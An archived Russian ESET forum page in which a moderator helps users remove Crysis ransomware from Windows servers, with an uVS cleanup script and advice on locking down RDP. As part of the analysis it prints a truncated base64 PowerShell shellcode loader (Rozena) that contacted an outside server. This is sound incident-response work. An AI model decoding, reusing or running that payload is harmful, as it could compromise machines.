Размещено 04.12.2018 18:39:41
посмотрите, что можно сделать через ELA
@Эдуард Чариков,
напишите в техподдержку [email protected]
напишите в техподдержку [email protected]
Дорогие участники форума!
Наш форум переведен в режим работы "только для чтения", публикация новых тем и сообщений недоступна. Мы искренне благодарны вам за то, что были с нами, но пришло время двигаться дальше. После официального ухода компании ESET с российского рынка мы приступили к разработке новых продуктов вместе с новыми партнёрами. Приглашаем вас присоединиться к нашему новому форуму PRO32.
Мы более не являемся эксклюзивным дистрибьютором программных продуктов словацкого разработчика ESET в России, Республике Беларусь, Казахстане, Азербайджане, Узбекистане, Кыргызстане, Таджикистане, Туркменистане, Молдове, Грузии и Армении.
Купить и продлить лицензии ESET на нашем сайте больше нельзя.
Предлагаем вам попробовать новые продукты компании PRO32.
PRO32 — это технологичные решения, надежная защита от киберугроз и максимальная производительность устройств. Для действующих клиентов ESET мы предлагаем промокод на скидку в размере 15% — ESET15. Скопируйте его и после добавления товара в корзину, не забудьте его применить в корзине.
Деактивация удаленных компов, ERA 6.4
[ Закрыто] Настройка и запуск WWWI для продукта ESET Mail Security for Linux
файлы зашифрованы с расширением .betta; .vanss; .like; .gdb; .xxxxx; .adobe; .tron; .AUDIT; .cccmn; .back; .Bear; .fire; .myjob; .war; .risk; .bkpx;.santa; .bizer, Filecoder.Crysis / Encoder.3953; r/n: info.hta
Размещено 04.12.2018 13:00:16
| Цитата |
|---|
| Роман Фадеев написал: здравствуйте, вирус проник в базу 1с, в результате файлы стали .adobe |
судя по образу автозапуска система уже очищена от вредоносных файлов шифратора.
по расшифровки .adobe, к сожалению, не сможем вам помочь, восстановление документов на текущий момент возможно,
только из архивных копий документов. (о которых не следует забывать в связи активностью шифраторов, и прочих катастроф)
в любом случае:
3. по расшифровке файлов при наличие лицензии на продукты ESET сделайте запрос в [email protected]
(хотя расшифровки по crysis.adobe на текущий момент нет)
4. важные зашифрованные документы, сохраните на отдельный носитель, возможно расшифровка станет доступной в будущем.
на будущее:
5. ограничьте доступ к серверу по RDP из внешней сети, сделайте настройки по ограничению попыток неправильного ввода паролей, чтобы блокировать потенциальных взломщиков учетных записей.
если сервер в вашей локальной сети, желательно настроить доступ из внешней сети к рабочим серверам через VPN подключение.
--------
злоумышленники, которые распространяют Crysis, как правило используют возможности получения доступа к RDP, путем взлома учетных записей на сервере.
файлы зашифрованы с расширением .betta; .vanss; .like; .gdb; .xxxxx; .adobe; .tron; .AUDIT; .cccmn; .back; .Bear; .fire; .myjob; .war; .risk; .bkpx;.santa; .bizer, Filecoder.Crysis / Encoder.3953; r/n: info.hta
Размещено 03.12.2018 16:50:59
| Цитата |
|---|
| Aleksandr Lebowski написал: Спасибо за ответ ) наверное полностью все сносить будем жаль что файлы не расшифровать |
на этот пункт обратите внимание.
| Цитата |
|---|
| 5. ограничьте доступ к серверу по RDP из внешней сети, сделайте настройки по ограничению попыток неправильного ввода паролей, чтобы блокировать потенциальных взломщиков учетных записей. если сервер в вашей локальной сети, желательно настроить доступ из внешней сети к рабочим серверам через VPN подключение. |
файлы зашифрованы с расширением .betta; .vanss; .like; .gdb; .xxxxx; .adobe; .tron; .AUDIT; .cccmn; .back; .Bear; .fire; .myjob; .war; .risk; .bkpx;.santa; .bizer, Filecoder.Crysis / Encoder.3953; r/n: info.hta
Размещено 03.12.2018 16:19:05
| Цитата |
|---|
| Aleksandr Lebowski написал: По поводу очистки системы, это мы удаляем сам вирус? и пункт 6, можете пояснить, я не понял |
да, судя по образу в системе был активен файл шифратора. в процессах:
Цитата
; Процессы
?ВИРУС? (A)| C:\PROGRAM FILES (X86)\TEAMVIEWER\TEAMVIEWER.EXE
?ВИРУС? (A)| C:\PROGRAM FILES (X86)\TEAMVIEWER\TEAMVIEWER_SERVICE.EXE
Win32/Filecoder.Crysis.L(64)| C:\USERS\АДМИНИСТРАТОР\APPDATA\ROAMING\EX.EXE
АКТИВЕН | C:\PROGRAM FILES (X86)\RAID WEB CONSOLE 2\FRAMEWORK\VIVALDIFRAMEWORK.EXE
без очистки системы, новые файлы будут опять зашифрованы.
по п.6 powershell установил подключение с адресом:
NetRange: 185.0.0.0 - 185.255.255.255
City: Amsterdam
Country: NL
и выполняет закодированный скрипт. который кстати, детектируется антивирусом как
PowerShell/Rozena.AF троянская программа
----------
возможно, скрипт работает на майнинг.
после очистки системы скриптом uVS необходимо выполнить сканирование системы штатным антивирусом если не планируете восстановить систему до безопасной точки восстановления, или переустановить систему.
если антивирусная защита не установлена, необходимо установить антивирусный продукт. например. ESET File Security v 6 или 7
файлы зашифрованы с расширением .betta; .vanss; .like; .gdb; .xxxxx; .adobe; .tron; .AUDIT; .cccmn; .back; .Bear; .fire; .myjob; .war; .risk; .bkpx;.santa; .bizer, Filecoder.Crysis / Encoder.3953; r/n: info.hta
Размещено 03.12.2018 12:26:43
| Цитата |
|---|
| Aleksandr Gordichuk написал: Здравствуйте! На Windows Server 2012 поймали шифровальщика в adobe ( ) |
по очистке системы выполните скрипт:
выполняем скрипт в uVS:
- скопировать содержимое кода в буфер обмена;
- стартуем uVS(start.exe), далее выбираем: текущий пользователь, меню - скрипты - выполнить скрипт из буфера обмена;
- закрываем все браузеры перед выполнением скрипта;
при деинсталляции программ - соглашаемся на деинсталляцию_удаление подтверждаем "да"
| Код |
|---|
;uVS v4.1.2 [http://dsrt.dyndns.org] ;Target OS: NTv6.3 v400c OFFSGNSAVE zoo %SystemDrive%\USERS\АДМИНИСТРАТОР\APPDATA\ROAMING\INFO.HTA ;------------------------autoscript--------------------------- del %SystemDrive%\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\DESKTOP.INI.ID-6E48641C.[[email protected]].ADOBE del %SystemDrive%\USERS\АДМИНИСТРАТОР\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\DESKTOP.INI.ID-6E48641C.[[email protected]].ADOBE delall %SystemDrive%\USERS\АДМИНИСТРАТОР\APPDATA\ROAMING\INFO.HTA delall %Sys32%\INFO.HTA zoo %SystemDrive%\USERS\АДМИНИСТРАТОР\APPDATA\ROAMING\EX.EXE addsgn A7679B1BB9DA4D720B132BD59A37ED05258AFC31CC061F7885C302F9A8D6714C237F43573E55F549CBC084F77AB749FA155F083255B230CC6D774CEEA8F9DDF0 8 Win32/Filecoder.Crysis.L 7 zoo %SystemDrive%\USERS\АДМИНИСТРАТОР\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\EX.EXE zoo %SystemDrive%\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\EX.EXE zoo %Sys32%\EX.EXE chklst delvir delref %SystemDrive%\USERS\АДМИНИСТРАТОР\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\DESKTOP.INI.ID-6E48641C.[[email protected]].ADOBE delref HTTPS://CLIENTS2.GOOGLE.COM/SERVICE/UPDATE2/CRX?RESPONSE=REDIRECT&PRODVERSION=38.0&X=ID%3DEFAIDNBMNNNIBPCAJPCGLCLEFINDMKAJ%26INSTALLSOURCE%3DONDEMAND%26UC delref %SystemDrive%\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\DESKTOP.INI.ID-6E48641C.[[email protected]].ADOBE apply deltmp czoo ;------------------------------------------------------------- QUIT |
без перезагрузки, пишем о старых и новых проблемах.
------------
....
3. по расшифровке файлов при наличие лицензии на продукты ESET сделайте запрос в [email protected]
(хотя расшифровки по crysis.adobe на текущий момент нет)
4. важные зашифрованные документы, сохраните на отдельный носитель, возможно расшифровка станет доступной в будущем.
5. ограничьте доступ к серверу по RDP из внешней сети, сделайте настройки по ограничению попыток неправильного ввода паролей, чтобы блокировать потенциальных взломщиков учетных записей.
если сервер в вашей локальной сети, желательно настроить доступ из внешней сети к рабочим серверам через VPN подключение.
6. обратите внимание на сетевую активность powershell
83.171.107.131:49157 <-> 185.224.249.30:9425
при этом выполняется закодированный в base64 скрипт.
| Код |
|---|
JABTAHQASQBwACAAPQAgACcAJABJAHAAYgBBACAAPQAgACcAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAdQBpAG4AdAAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsACAAdQBpAG4AdAAgAGQAdwBTAHQAYQBjAGsAUwBpAHoAZQAsACAASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwAIAB1AGkAbgB0ACAAZAB3AEMAcgBlAGEAdABpAG8AbgBGAGwAYQBnAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEkAZAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAEkAcABiAEEAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAZABiACwAMAB4AGQAZgAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQBkACwAMAB4AGIAOAAsADAAeAA2ADQALAAwAHgANwBiACwAMAB4ADAAOAAsADAAeAA4ADAALAAwAHgAMgA5ACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANAA3ACwAMAB4ADgAMwAsADAAeABlAGQALAAwAHgAZgBjACwAMAB4ADMAMQAsADAAeAA0ADUALAAwAHgAMQA0ACwAMAB4ADAAMwAsADAAeAA0ADUALAAwAHgANwAwACwAMAB4ADkAOQAsADAAeABmAGQALAAwAHgANwBjACwAMAB4ADkAMAAsADAAeABkAGYALAAwAHgAZgBlACwAMAB4ADcAYwAsADAAeAA2ADAALAAwAHgAOAAwACwAMAB4ADcANwAsADAAeAA5ADkALAAwAH |
а так же обнаружен внедренный поток.
(!) ПРЕДУПРЕЖДЕНИЕ: Обнаружен внедренный поток в процессе C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE [1828], tid=1972
периодически вылезает реклама в хроме
Размещено 02.12.2018 18:44:57
| Цитата |
|---|
| Anton Ivanov написал: Добрый вечер! Столкнулся с аналогичной проблемой, периодически вылезает реклама в хроме. Воспользовался утилитой FarBar Recovery: получил лог FRST. Что делать дальше? |
[ Закрыто] вопрос по работе ESET ONLIYN SCANER
Размещено 02.12.2018 06:15:51
| Цитата |
|---|
| Татьяна Колдышева написал: а как удалить то что в карантине? |
[ Закрыто] вопрос по работе ESET ONLIYN SCANER
[ Закрыто] Продление/покупка/расширение/перенос/конвертирование лицензии, главная
Размещено 30.11.2018 06:43:18
напишите в [email protected]